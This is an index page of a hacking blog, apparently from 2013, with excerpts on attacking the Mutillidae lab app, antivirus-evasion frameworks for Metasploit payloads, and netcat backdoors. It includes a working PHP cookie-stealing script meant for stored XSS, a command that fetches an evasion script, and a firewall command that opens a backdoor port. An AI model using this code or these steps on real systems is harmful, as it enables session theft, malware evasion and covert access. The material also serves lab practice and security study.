Home » All posts

Wednesday, November 20, 2013

Broken Authentication & Session Management in Mutillidae

Posted by nirav desai at 2:04 PM Labels: , 1 comments
Broken Authentication and Session Management is on number 2 in OWASP Top 10 vulnerability list 2013. In mutillidae , it contain three subsection.

  • Authentication Bypass
  • Privilege Escalation
  • Username Enumeration

We have already covered Username enumeration in last article & we got valid username list which exist in database. Today we are going to use authentication bypass method.

  1. Using cookie
  2. Using brute-force
  3. Using SQL injection

(1)Authentication Bypass using cookie:- 

As we know that , mutillidae is vulnerable to XSS, so we can capture cookie with help of XSS. We are going to take advantage of persistent XSS.

http://127.0.0.1/mutillidae/index.php?page=add-to-your-blog.php

Above link is vulnerable to persistent XSS attack. We can submit html to add blog section.so we are going to use cookie-catcher.

Content of cookie_catcher.php :-

<?php
header ("Location: http://192.168.56.1");
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>

Upload your cookie_catcher.php to server. For demo i used my local apache server & after execution of script it will redirect to 192.168.56.1.You can change the code according to your need. It will grab IP, cookie, Referer, time & date.
Read more »

Saturday, November 16, 2013

How to solve compile error in veil?

Posted by nirav desai at 5:29 PM Labels: , 0 comments
As you know, veil is AV evasion framework for metasploit payload. On the 15th of every month, for the next year, at least one new payload module will be released.Yesterday they released two new payload.

  1. pure windows/meterpreter/reverse_tcp stager, no shellcode
  2. pure windows/meterpreter/reverse_tcp windows service stager compatible with psexec, no shellcode

Compiler Error in c payloads:-


 Available c payloads:

    VirtualAlloc                         Poor
    VoidPointer                         Poor
    meter_rev_tcp                     Excellent
    meter_rev_tcp_service        Excellent

c/meter_rev_tcp

I used c/meter_rev_tcp. After setting of LHOST & LPORT ; when i try to generate it ; i got error.
Read more »

Monday, November 11, 2013

Username Enumeration in Mutillidae using Burpe Intruder.

Posted by nirav desai at 1:16 PM Labels: , , 0 comments
Mutillidae  is a free, open source, vulnerable web-application providing a target for web-security tester. Mutillidae can be installed on Linux and Windows using LAMP, WAMP, and XAMMP.

Username Enumeration :- We have an application that will reveal to us when a username exists on the system which can be used in further step like brute-force account.

In Mutilliade login page , when you provide valid username & invalid password , web-application reply us that password incorrect.

Username Enumeration


When we provide invalid username ; then application tell us that Account does not exist.

Username Enumeration Mutillidae

So by monitoring web-application message one can know that username is valid or not.

First we will examine source code of page ; when we provide valid username reply is "var lAuthenticationAttemptResultFlag = 1" & when we provide invalid username reply is "var lAuthenticationAttemptResultFlag = 0"

var lAuthenticationAttemptResultFlag = 1    It means username exist.

var lAuthenticationAttemptResultFlag = 0    It means username does not exist.

Read more »

Wednesday, October 30, 2013

List of Differnet AV evasion Frameworks.

Posted by nirav desai at 3:50 PM Labels: , 5 comments
Today we are gonna talk about different AV evasion frameworks for metasploit payload & how to use them? It`s very imporatant when you know which AV you have to bypass, because we don`t have to worry about FUD. Some payload can bypass specific AV ; while other AV can not be bypassed using that payload.

(1)Veil:-


Veil is python based tool which create FUD payload , One of the best framework for AV evasion. On the 15th of every month, at least one new payload module will be released.

Click here for how to install & use Veil?

(2)AV0id :-


Anti-Virus Bypass Metasploit Payload Generator Script.

wget https://github.com/nccgroup/metasploitavevasion/archive/master.zip
unzip master.zip
cd metasploitavevasion-master/
./avoid.sh

Antivirus Evasion

Read more »

Thursday, October 24, 2013

Backdoor using Netcat, cryptcat , ncat.

Posted by nirav desai at 5:30 PM Labels: 3 comments
Today we are gonna talk about Netcat & its alternative ; i assume that all of you are familiar with Netcat. If not than read here.  Also i assume that you have already open port 455 using following command.

netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL

Attacker `s I.P : 192.168.56.1

Victim`s I.P.     : 192.168.56.101

We will talk about Netcat, cryptcat & ncat.

(A)Netcat:-


Netcat is used as backdoor. After gaining access to machine , we are creating "netcat" as startup service using changes to the system registry . And then we are gonna open port for communication. At attacker side just start  netcat listener. Here is tutorial on how to create netcat backdoor?

But if you know about method used in that tutorial ; there are some disadvantages of using netcat.

(1)Most of AV flag netcat as hacking tool :- I know You can use crypter , but still general behavior detection  possible by AV.

netcat-virustotal


(2)Clear text communication (No encryption):-anyone from same network can view your communication.Also due to clear text communication firewall or AV can popup & block our communication.

netcat-capture-traffic-using-wireshark
Read more »
UA-35960349-1